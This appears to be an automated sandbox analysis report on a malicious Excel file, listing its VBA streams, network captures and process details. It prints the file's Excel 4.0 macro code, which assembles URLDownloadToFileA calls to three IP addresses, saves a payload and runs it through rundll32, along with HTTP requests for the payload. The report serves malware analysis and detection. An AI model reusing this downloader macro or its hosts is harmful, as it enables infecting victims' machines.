Private Sub Auto_Open()
Application.Run Sheets("Nyukasl").Range("AJ6")

Application.Run Sheets("Nyukasl").Range("A5")
Application.Run Sheets("Nyukasl").Range("A5")






End Sub
VBA File Name: Briks.cls, Stream Size: 990
General
Stream Path:VBA/Briks
VBA File Name:Briks.cls
Stream Size:990

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
"Briks"
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Briks"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: Byutut.bas, Stream Size: 1056
General
Stream Path:VBA/Byutut
VBA File Name:Byutut.bas
Stream Size:1056

VBA Code Keywords

Keyword
Attribute
VB_Name
"Byutut"
VBA Code
Attribute VB_Name = "Byutut"
VBA File Name: Class1.cls, Stream Size: 1151
General
Stream Path:VBA/Class1
VBA File Name:Class1.cls
Stream Size:1151

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Class2.cls, Stream Size: 999
General
Stream Path:VBA/Class2
VBA File Name:Class2.cls
Stream Size:999

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Class3.cls, Stream Size: 999
General
Stream Path:VBA/Class3
VBA File Name:Class3.cls
Stream Size:999

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Kikide.cls, Stream Size: 1249
General
Stream Path:VBA/Kikide
VBA File Name:Kikide.cls
Stream Size:1249

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
"Kikide"
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Kikide"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
VBA File Name: UserForm1.frm, Stream Size: 1526
General
Stream Path:VBA/UserForm1
VBA File Name:UserForm1.frm
Stream Size:1526

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Vrest.bas, Stream Size: 679
General
Stream Path:VBA/Vrest
VBA File Name:Vrest.bas
Stream Size:679

VBA Code Keywords

Keyword
Attribute
"Vrest"
VB_Name
VBA Code
Attribute VB_Name = "Vrest"
VBA File Name: Vsewd.cls, Stream Size: 990
General
Stream Path:VBA/Vsewd
VBA File Name:Vsewd.cls
Stream Size:990

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"Vsewd"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VBA Code
Attribute VB_Name = "Vsewd"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856
General
Stream Path:PROJECT
File Type:ASCII text, with CRLF line terminators
Stream Size:856
Entropy:5.31019504221
Base64 Encoded:True
Data ASCII:I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4
Stream Path: PROJECTwm, File Type: data, Stream Size: 209
General
Stream Path:PROJECTwm
File Type:data
Stream Size:209
Entropy:3.32661660177
Base64 Encoded:False
Data ASCII:K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
General
Stream Path:UserForm1/\x1CompObj
File Type:data
Stream Size:97
Entropy:3.61064918306
Base64 Encoded:False
Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
General
Stream Path:UserForm1/\x3VBFrame
File Type:ASCII text, with CRLF line terminators
Stream Size:266
Entropy:4.62034133633
Base64 Encoded:True
Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Stream Path: UserForm1/f, File Type: data, Stream Size: 38
General
Stream Path:UserForm1/f
File Type:data
Stream Size:38
Entropy:1.54052096453
Base64 Encoded:False
Stream Path: UserForm1/o, File Type: empty, Stream Size: 0
General
Stream Path:UserForm1/o
File Type:empty
Stream Size:0
Entropy:0.0
Base64 Encoded:False
Data ASCII:
Data Raw:
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263
General
Stream Path:VBA/_VBA_PROJECT
File Type:data
Stream Size:4263
Entropy:4.38205341073
Base64 Encoded:False
Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Stream Path: VBA/dir, File Type: data, Stream Size: 1024
General
Stream Path:VBA/dir
File Type:data
Stream Size:1024
Entropy:6.73319737871
Base64 Encoded:True
Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -

Macro 4.0 Code

,,"=CONCATENATE(AF80,AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AF80,AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AF80,AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,"=""http://""","=""91.211.91.81/""",,,=HALT(),,,"=""5.34.179.36/""",,,,,,"=""45.153.229.23/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
"=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/04/21-18:25:00.729496 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49165 | 91.211.91.81 | 192.168.2.22
05/04/21-18:25:01.482346 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49166 | 5.34.179.36 | 192.168.2.22
05/04/21-18:25:01.692668 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 45.153.229.23 | 192.168.2.22

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 18:25:00.495213032 CEST | 49165 | 80 | 192.168.2.22 | 91.211.91.81
May 4, 2021 18:25:00.580924988 CEST | 80 | 49165 | 91.211.91.81 | 192.168.2.22
May 4, 2021 18:25:00.581046104 CEST | 49165 | 80 | 192.168.2.22 | 91.211.91.81
May 4, 2021 18:25:00.582185030 CEST | 49165 | 80 | 192.168.2.22 | 91.211.91.81
May 4, 2021 18:25:00.665724039 CEST | 80 | 49165 | 91.211.91.81 | 192.168.2.22
May 4, 2021 18:25:00.729496002 CEST | 80 | 49165 | 91.211.91.81 | 192.168.2.22
May 4, 2021 18:25:00.729610920 CEST | 49165 | 80 | 192.168.2.22 | 91.211.91.81
May 4, 2021 18:25:00.762547970 CEST | 49166 | 80 | 192.168.2.22 | 5.34.179.36
May 4, 2021 18:25:00.907682896 CEST | 80 | 49166 | 5.34.179.36 | 192.168.2.22
May 4, 2021 18:25:00.907790899 CEST | 49166 | 80 | 192.168.2.22 | 5.34.179.36
May 4, 2021 18:25:00.908478022 CEST | 49166 | 80 | 192.168.2.22 | 5.34.179.36
May 4, 2021 18:25:01.053366899 CEST | 80 | 49166 | 5.34.179.36 | 192.168.2.22
May 4, 2021 18:25:01.482346058 CEST | 80 | 49166 | 5.34.179.36 | 192.168.2.22
May 4, 2021 18:25:01.482428074 CEST | 49166 | 80 | 192.168.2.22 | 5.34.179.36
May 4, 2021 18:25:01.495521069 CEST | 49167 | 80 | 192.168.2.22 | 45.153.229.23
May 4, 2021 18:25:01.563970089 CEST | 80 | 49167 | 45.153.229.23 | 192.168.2.22
May 4, 2021 18:25:01.564171076 CEST | 49167 | 80 | 192.168.2.22 | 45.153.229.23
May 4, 2021 18:25:01.565252066 CEST | 49167 | 80 | 192.168.2.22 | 45.153.229.23
May 4, 2021 18:25:01.631198883 CEST | 80 | 49167 | 45.153.229.23 | 192.168.2.22
May 4, 2021 18:25:01.692667961 CEST | 80 | 49167 | 45.153.229.23 | 192.168.2.22
May 4, 2021 18:25:01.692867041 CEST | 49167 | 80 | 192.168.2.22 | 45.153.229.23
May 4, 2021 18:26:05.730789900 CEST | 80 | 49165 | 91.211.91.81 | 192.168.2.22
May 4, 2021 18:26:05.730952024 CEST | 49165 | 80 | 192.168.2.22 | 91.211.91.81
May 4, 2021 18:26:06.481005907 CEST | 80 | 49166 | 5.34.179.36 | 192.168.2.22
May 4, 2021 18:26:06.481180906 CEST | 49166 | 80 | 192.168.2.22 | 5.34.179.36
May 4, 2021 18:26:06.690161943 CEST | 80 | 49167 | 45.153.229.23 | 192.168.2.22
May 4, 2021 18:26:06.690356016 CEST | 49167 | 80 | 192.168.2.22 | 45.153.229.23
May 4, 2021 18:27:00.392105103 CEST | 49167 | 80 | 192.168.2.22 | 45.153.229.23
May 4, 2021 18:27:00.392354012 CEST | 49166 | 80 | 192.168.2.22 | 5.34.179.36
May 4, 2021 18:27:00.392688036 CEST | 49165 | 80 | 192.168.2.22 | 91.211.91.81
May 4, 2021 18:27:00.457731009 CEST | 80 | 49167 | 45.153.229.23 | 192.168.2.22
May 4, 2021 18:27:00.477420092 CEST | 80 | 49165 | 91.211.91.81 | 192.168.2.22
May 4, 2021 18:27:00.537447929 CEST | 80 | 49166 | 5.34.179.36 | 192.168.2.22

HTTP Request Dependency Graph

  • 91.211.91.81
  • 5.34.179.36
  • 45.153.229.23

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 91.211.91.81 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 18:25:00.582185030 CEST | 0 | OUT | GET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.211.91.81
Connection: Keep-Alive
May 4, 2021 18:25:00.729496002 CEST | 1 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 16:25:00 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 5.34.179.36 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 18:25:00.908478022 CEST | 1 | OUT | GET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 5.34.179.36
Connection: Keep-Alive
Timestamp: May 4, 2021 18:25:01.482346058 CEST | kBytes transferred: 2 | Direction: IN
HTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 16:25:01 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID: 2
Source IP: 192.168.2.22
Source Port: 49167
Destination IP: 45.153.229.23
Destination Port: 80
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp: May 4, 2021 18:25:01.565252066 CEST | kBytes transferred: 3 | Direction: OUT
GET /44313,6048108796.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 45.153.229.23
Connection: Keep-Alive
Timestamp: May 4, 2021 18:25:01.692667961 CEST | kBytes transferred: 4 | Direction: IN
HTTP/1.1 403 Forbidden
Server: nginx
Date: Tue, 04 May 2021 16:25:01 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

System Behavior

General

Start time: 18:24:39
Start date: 04/05/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f820000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly
